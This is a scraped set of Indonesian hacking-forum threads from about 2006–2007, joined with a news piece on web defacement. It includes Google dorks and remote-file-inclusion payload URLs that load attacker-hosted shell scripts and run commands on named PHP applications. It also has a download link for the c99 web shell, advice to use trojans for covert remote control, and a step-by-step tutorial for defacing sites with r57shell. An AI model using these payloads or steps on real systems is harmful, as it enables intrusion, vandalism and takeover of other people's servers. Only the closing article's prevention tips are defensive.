--------------------------------------------------------------------------------
charles78908-05-2007, 04:12 AM
jika kk masi penasaran sama yg namanya internet kk bisa kul di jurusan Teknik
informatika atau ga cari kursus2 komputer gitu.soal menembus batas limit itu ga bisa
kk.kecuali km dapat user id ama pass dia wat login ke router gitu dengan memakai putty
sebagai contohnya.
--------------------------------------------------------------------------------
gungbaster08-05-2007, 08:02 AM
waduh klo nembus model yg TS mau tuh ilmu high level hacker mantap dah lo klo bisa
gue grp apalagi sampe isa jebol bandwith
gue aja neh lagi trouble nembus bandwith speedy di salah satu client gue masa gue
dikasih cuman 64Kbps doang dengan downstream 5KBS/s doang mantap dah neh speedy
dari hari ke hari tambah parah
ampun dahhhhhhhhhh kayak gini perusahaan punya pemerintah yg dikelola gak prof
--------------------------------------------------------------------------------
dr_veelgood08-05-2007, 07:13 PM
download dari rs transfer rate nya cuma 1 kb/s?itu artinya kecepatan transfer rate internet
km cuma 1 kb/s.biasanya semakin mahal bandwith yg km beli maka transfer rate km
akan makin bsr.sbg cnthnya gini:
kk sewa internet 64 kbps dedicated 1:1 maka km akan dpt transfer rate download sebesar
8 kb/s.dari manakah saya bisa blg dpt 8 kb/s.caranya gini:
64 kbps dibagi 8 bit maka hasilnya menjadi 8 kbps.
justru itu bos...ditempat gw gawe tuh bandwithnya 2 MB n 1:1 pula...;;)...thanx atas
penjelasannya...tapi gw udah tau pula soal itung"annya...oia,speed yang gw sebut itu
cuma sample aja kok..aslinya mah gak segitu juga...:P...sedangkan RS itu cuma sample
aja...intinya bisa nagkep khan...:)
jika kk masi penasaran sama yg namanya internet kk bisa kul di jurusan Teknik
informatika atau ga cari kursus2 komputer gitu.soal menembus batas limit itu ga bisa
kk.kecuali km dapat user id ama pass dia wat login ke router gitu dengan memakai putty
sebagai contohnya.
sekali lagi thanx atas masukannya...:-*...tapi ane dah melewati masa" kuliah bos...
--------------------------------------------------------------------------------
newbie_neutron13-05-2007, 06:36 PM
Login as adminsitrator mungkin....???
--------------------------------------------------------------------------------
kampang26-06-2007, 02:00 PM
pake HTTP, cari aja oms di google
--------------------------------------------------------------------------------
sliver_emas10-08-2007, 07:03 PM
Ada salah satunya dengan Sniffing....tapi itu hanya untuk cari tau lebih lanjut tentang
password dan username admin....itu aja
--------------------------------------------------------------------------------
ngecroth12-08-2007, 04:55 AM
secure-tunnel.com
pengen tahu cara ngremote komputer
kurei
09-04-2007, 10:35 AM
mas2.. mbak2.. yang pinter2.. kasih tahu donk caranya ngremote komputer orang.
toolsnya apa aja, terus...... caranya gimana, yang rinci lho!!!!!!!!!!!, thank you>:D<
War**Angel
09-04-2007, 07:27 PM
tools bisa googling boss
VNC, NetBus, Back Orifice
gungbaster
09-04-2007, 08:46 PM
:DBack Orifice kayak na gak isa di pake lagi soalna tuh program jadul udah di patch ama microsoft
klo hari gini mau nge remote kompu orang lo harus isa ngakalin windows patch, firewall, ama
antivirus susah booo kemungkinan berhasil na sekitar 1% too (itu juga klo yg make kompu na
bego)
klo menurut gue cara yg terbaik pake trojan atau virus varian baru yg lo modif source code na yg
isa membuka hole security di suatu kompu (minimal isa mematikan firewall) klo pake tools kayak
na gak isa (mana ada orang yg mau dipasangin tools biar kompu na isa lo remote:D:D )
searching aja pake googling, yahooing, ama nungging wkwkwkwkwkw:D:D
cemens
09-04-2007, 09:30 PM
@gung
kek nya kompi wa kena trojan atau virus varian baru neh[yang di modif]
/sob /sob /sob /sob
gungbaster
09-04-2007, 09:38 PM
@atas
sing sabar bos
hari gini yg bikin virus pada bedul nyusahin aja (virus indo kok temanya kebanyakan cinta molo ya)
parahhhh
CalvinLimuel
09-04-2007, 09:41 PM
Windows Remoting
Trojan Horse
War**Angel
10-04-2007, 09:05 AM
back orifice yg editan dong
source kan ada diluaran
kurei
10-04-2007, 09:38 AM
thank yoou...... bro......... gue dulu pernah donlot awrc di www.atelierweb.com tapi kok ya.. ga bisa
ya?. katanya not support gto. yang paling bagus emang trojan ya?. klo Netbus sekarang versinya
dah berapa aja?. terakhir aku punya yang versi 2.01 klo ga salah, tapi file nya corrupt. aneh
deh........
smart-brain
12-04-2007, 10:59 AM
pake radmin ajah.
kurei
12-04-2007, 11:41 AM
Tapi pas aku baca di bukunya S'to yang kedua "Seni Teknik Hacking" tuh aku baca klo dia ngremote
komputer pake command promt(DOS).kira2 cara itu masih tokcer kagak ya?. tapi klo tools nya
udah expired bo!.Oiya satu lagi. aku nyari Windows Remoting yang disaranin OM Calvin Limuel, pke
google ga bisa. punya toolsnya kan om?. bagi2 donk!!!!!!!!!!. yup!!!!!!!!!
abdee
24-04-2007, 01:18 AM
helpppp kompi ANE kena virus trojan nih gmn ngilangin nya mohon bantuan nya kk semua,dah
pusing nih ga ilang2,o0 iya nih mo tanya klo kom kita kena virus trus d ghost k kom yg ga ada virus
nya ilang ga tuh virus nya,(d tunggu jawabnya oce^_^ THANK
gungbaster
03-05-2007, 04:03 AM
@atas
klo di ghost rasanya virusnya ngikut tuh
cuekaja
04-05-2007, 06:48 AM
buat ngremote komputer komputer orang, harus tau tentang tcp dolo, soalnya kita harus tau ip dan
port berapa yang bisa di akses dari luar.
http://www.astalavista.com/images/gallery/17.jpg
http://i27.photobucket.com/albums/c192/ … shy2nz.gif
vBulletin® v3.8.3, Copyright ©2000-2009,
IndoForum > Hobby > Computer Stuff > Security & Hacking > hacking : Cara Deface
--------------------------------------------------------------------------------
PDAView Full Version : hacking : Cara Deface
--------------------------------------------------------------------------------
dede2303-08-2006, 04:23 PM
Saya ingin berbagi pengalaman tentang nge-Deface dan berbagai command command
yang bermanfaat bagi kita didalam nge-Deface..
Oke deh ga perlu berpanjang lebar apa itu DEFACE.... wong kita cuman mempelajari
bagaimana caranya masuk ke dalam web seseorang yang didalamnya terdapat BUG atau
kesalahan kesalahan yang terdapat pada Script atau Link nya..
Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command
command yang bermanfaat bagi kita..
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk
tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
- Oneadmin
Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:.net
nah sekarang saya kasi contoh pathnya …
http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=http://geocities.com/hackerbalines
e/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al
- PnPhpBB2
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2
site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka
atau kehendaki...
nah sekarang saya kasi contoh pathnya …
http://target.com/modules/PNphpBB2/incl … root_path=
Contoh :
http://www.sikhe.com/modules/PNphpBB2/i … pbb_root_p
ath=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname%20-a;cd;pwd
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com /
include/main.php site:.net atau apa saja yang kalian suka atau kehendaki...
nah sekarang saya kasi contoh pathnya …
http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : …
http://target.com/include/main.php?config[search_disp]=true&include_dir=http://geocitie
s.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al
Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..
http://vampiredirectory.com/hackbalinese.htm
http://stolenwings.com/hackbalinese.htm
http://miserygirl.com/hackbalinese.htm
http://dashfilms.com/hackbalinese.htm
Kunjungi WEb site kami Di www.bali-source.net
Hak Cipta 2005 by #balinesehacker Crew
Join My Channel at #balinesehacker Mirc.dal.net
Haloo...salam kenal from MR.R0cks..
Special Thax's to ...
dEdE_DeFaN-Malanghack.net-Arakbali-SKYstRom
(iseng ngambil dr site bali )
--------------------------------------------------------------------------------
asa1704-08-2006, 09:33 AM
oke tuch, tak pelajari dulu yach, ntar kl bingung leh nanya kan
--------------------------------------------------------------------------------
Jourdan04-08-2006, 12:02 PM
swt, gwe pernah baca nieh article di apa hack.com gitu
jambi_hack kayanya
--------------------------------------------------------------------------------
dede2304-08-2006, 03:14 PM
@jour
(iseng ngambil dr site bali )
lupa wa site nya
--------------------------------------------------------------------------------
asa1709-08-2006, 10:30 AM
temen2 saya baru belajar nich, tolong ada yang bisa bantu ng, ketika saya menggunakan
metasploit framework dan telah selesai mengetikkan perintahnya muncul error seperti ini
WARNING: Socket error: Connection failed: Operation now in progress at /home
/framework/lib/Pex/DCERPC.pm line 825.
apa yang salah ya...apakah pada kompie saya ato yang laen , tolong kasih pencerahan
terimakasih
--------------------------------------------------------------------------------
Jourdan10-08-2006, 07:22 PM
oh iya, koq jambi_hack... bali_hack ding
--------------------------------------------------------------------------------
Th0R10-08-2006, 07:27 PM
/swt /swt /swt
Why dont u just use that kind of RFI to use the c99 or r57??
Then just easily upload shells on it?? LOL
Why do we need to deface something which vulnerable enough to be taken over??
And i do believe there is something that u need to patch on the site of http://www.balisource.
net
Not quite Critical .. But kinda annoying vulnerabilities believe ..
Thanks.
Th0R
--------------------------------------------------------------------------------
kodoks17-08-2006, 07:00 PM
/swt /swt /swt
Why dont u just use that kind of RFI to use the c99 or r57??
Then just easily upload shells on it?? LOL
Why do we need to deface something which vulnerable enough to be taken over??
And i do believe there is something that u need to patch on the site of http://www.balisource.
net
Not quite Critical .. But kinda annoying vulnerabilities believe ..
Thanks.
Th0R
Damn... its right!
but where i can find them? i forget the link to download c99sh.php /pif!
c99sh adalah php shell, yang dapat membuat kamu mengrayangi webserver seseorang
persyaratan nya : ini harus diupload dolo ke webserver orang!
DL : http://rapidshare.de/files/9548673/C99sh.zip.html
gw mau kasi demo, tapi nanti web gw dibabat.... gw ngedeface beberapa site pake ini,
dan sedikit cara naif.
--------------------------------------------------------------------------------
green_kid27-08-2006, 04:02 PM
Thanks lumayan berguna juga /hmm
--------------------------------------------------------------------------------
dede2327-08-2006, 04:07 PM
sama2 kk.......
--------------------------------------------------------------------------------
kodoks28-08-2006, 06:55 PM
sama2 kk.......
boz, ud ada yang ente upload sama c99sh gak /sob... pengen gw obok2 ne /gg /gg /gg
--------------------------------------------------------------------------------
TequilaSunrise06-09-2006, 08:52 PM
--- Quote ---
cd namadirectory = Melihat Suatu directory
--> koreksi : cd = change directory, pindah ke directory yg dimaksud, bukan lihat.
ls -al = Melihat Suatu Directory Lebih Dalam lagi
--> koreksi : -a = all files termasuk hidden *nix files (file yg dimulai dengan titik)
-l = long listing (tampilkan list panjang), jadi bukan melihat lebih dalam (recursive)
fined = Mengecek Directory directory
--> no comment, dengar aja blom pernah.
wget = MengUpload suatu Files
--> koreksi : wget untuk download, sama dengan flashget di windows
uname -a = Keberadaan Path berada
--> koreksi : ini untuk print informasi sistem, kernel version etc.
PS : semua diatas adalah perintah Linux/*nix/*BSD
- Oneadmin
--- end quote ---
Tequila!
--------------------------------------------------------------------------------
Gloria13-09-2006, 06:54 PM
Nggak ngerti /swt gw Pengen belajar nich /gg /no1
http://target.com/oneadmin/config.php?path[docroot]=
docroot apaan /? /swt Gw Pengen Nge Deface Web Skull Gw fu** Web
(http://www.telkomsekolah-online.net/sekolah.php?pathcd)
--------------------------------------------------------------------------------
kyuzu13-09-2006, 08:01 PM
alah, menurut gw hacking ma bulshit ...>!!!!
so fact, cuma org dalem yg mampu hacking, yg luar mane tau, klo gw pake logaritmany
gw bikin logaritma kuadrat, jadi ibaratnye, untuk mengakses satu webadmin, butuh 10x
pas, gmn yg hack?
pake bruce attack <<< zaman kuno
klo buat rusuh pake aje ini:
DoS router <<< baru mantab /no1
--------------------------------------------------------------------------------
IMAN_MANIAKS05-10-2006, 02:26 PM
coba dah masuk ke batam hacker!!!!,,,udh ada yg pernah msk lom !???? klo si dede 23
mah !!! bullshit abissssss
--------------------------------------------------------------------------------
IMAN_MANIAKS05-10-2006, 02:32 PM
ehh klo bisa !!! coba deface situs laknat ini = > shit sites (lautan.indosiar.com)
--------------------------------------------------------------------------------
D-Cracker10-10-2006, 08:12 PM
Hr Gene LI /? Nggak Zaman /swt Lu Msk Dech Web Nya Terrorist Iraq Atau Nggak
Kirim BackDoor / Trojan Horse ke USA Defence Dept /gg
--------------------------------------------------------------------------------
itlust10-10-2006, 09:29 PM
intinya soal deface itu kan menemukan bug pada web dan mengeksploitasi kelemahan
tsb...right?
--------------------------------------------------------------------------------
D-Cracker12-10-2006, 10:06 AM
Knp Sih Nggak Ada Yg Berani Bikin Thread , Nyuspin Back Door Ke Web /?
--------------------------------------------------------------------------------
Th1R12-10-2006, 10:09 AM
D-Cracker kan hacker, kenapa nggak bikin threadnya bung?
Ayo ditunggu nih tutor nya...
GYIHIHIHIHIHIHH
--------------------------------------------------------------------------------
D-Cracker12-10-2006, 07:10 PM
D-Cracker kan hacker, kenapa nggak bikin threadnya bung?
Ayo ditunggu nih tutor nya...
GYIHIHIHIHIHIHH
__________________
Thanks,
Th1R
IP Lu Gw Cek Ya /pmg Sapa Tau Lu ***r@binus.com /? <-- Understand What I Mean /?
Klo Emang Bener Ya Ud /heh Welcome In IF /gg
--------------------------------------------------------------------------------
kurei09-04-2007, 11:02 AM
wah............ ampe sekarang gua ga bisa ngedeface web,,,,
--------------------------------------------------------------------------------
kodoks09-04-2007, 11:15 AM
itu diatas command2 buat server Linux...
kalo Files dan Folder nya PAKE CHMOD 777 bakalan jalan...
tinggal pakein cara yang dikasih tau diatas = BLAH... ANCUR KABEH ITU WEB )
Mangkanya, sebelum ngedeface / hack web...
lo musti tau, Tipe OS, Document Root dll.. biar keliatan gak penting tapi....!
--------------------------------------------------------------------------------
zoiz09-04-2007, 11:21 AM
OO..Th0r kok di banned yah disini? Maaf masih baru
Regard,
zoiz
--------------------------------------------------------------------------------
vBulletin® v3.8.3, Copyright ©2000-2009, Jelsoft Enterprises Ltd.
CARA DEFACE
Ini ada tutorial Cara deface yg praktis
1. Buka www.milw0rm.com
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak
gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini untung nya Pake
Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh
Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di
advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion,
bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut,
atau memang beda versi, dan kemungkinan lain
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error,
13. Ganti command exploit setelah tanda ‘=’[sama dengan] dengan
http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilakan
PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan
Direktory yang memilikik full akses atau -rwxrwxrwx / -rw-rw-rw <– untuk file |
drwxrwxrwx / drw-rw-rw <– untuk direktory
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file
index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code
kamu jgn lupa nama manadocoding dikibarkan disana…
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path
yang kamu ubah tadi
Semoga membantu.
Teknik Web Deface dan Cara Pencegahannya
Posted by: foruminformatika on: September 30, 2007
· In: Security
· Comment!
Published on http://batampos.co.id/content/view/31768/98/
Beberapa minggu lalu, ketika masalah pemukulan warga negara Indonesia oleh polisi
Malaysia, dunia internet Indonesia ramai oleh kelakuan para hacker merusak tampilan
situs-situs yang berdomain Malaysia.
Juga beberapa bulan lalu ketika krisis Ambalat berlangsung, kedua kubu saling serang
web deface.
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat
dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.
Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan
defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan
melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server
yang berlebihan sehingga kerja server lambat dan lama-kelamaan server akan crash dan
down. Untuk dapat melakukan web deface, defacer melakukan beberapa tahap sebagai
berikut :
a. Mencari kelemahan pada sistem security, menemukan celah yang dapat dimasuki untuk
melakukan eksplorasi di server target. Dia akan melakukan scanning tentang sistem
operasi, service pack, service yang enable, port yang terbuka, dan lain sebagainya.
Kemudian dianalisa celah mana yang bisa dimasuki.
b. Melakukan penyusupan ke server korban. Teknik ini dia akan menggunakan beberapa
tools, file yang akan disisipkan, file exploit yang dibuat sengaja untuk di-copy-kan.
Setelah berhasil masuk , tangan-tangan defacer bisa mengobok-obok isi server.
Tapi tidak adil kiranya jika hanya sharing tentang teknik deface web. Maka untuk
pengelola situs harus waspada, karena deface bisa jadi bencana yang sangat merepotkan.
Pekerjaan menata ulang dan memperbaiki bagian yang rusak, bukan pekerjaan yang
mudah. Karena itu sebelum situs anda digerayangi seyogyanya melakukan langkahlangkah
preventif sebagai berikut :
1. Rutin melakukan update, upgrade dan patch pada sistem operasi dan aplikasi-aplikasi
yang dipakai.
2. Memeriksa ulang dan memperbaiki konfigurasi pada sistem operasi, web server dan
aplikasi lainnya.
3. Menganalisa kembali service-service yang aktif, matikan jika tidak perlu.
4. Mengatur jadwal untuk melakukan backup data penting, file konfigurasi sistem,
database, sehingga jika sewaktu-waktu terjadi deface, anda tinggal menggunakan data
backup.
5. Melindungi server dengan firewall dan IDS. Kedua tools ini ampuh untuk mengatasi
serangan denial of service(DoS) attack.
6. Selalu memperhatikan hal-hal yang mencurigakan pada server, baca log system
operasi, log web server ataupun log aplikasi.
7. Melakukan vulnerability scanning secara rutin, juga melakukan private security test.
Demikian beberapa trik, baik melakukan deface (meskipun tak secara detail/teknis)
maupun menangkal deface. Semoga website anda aman dari serangan para hacker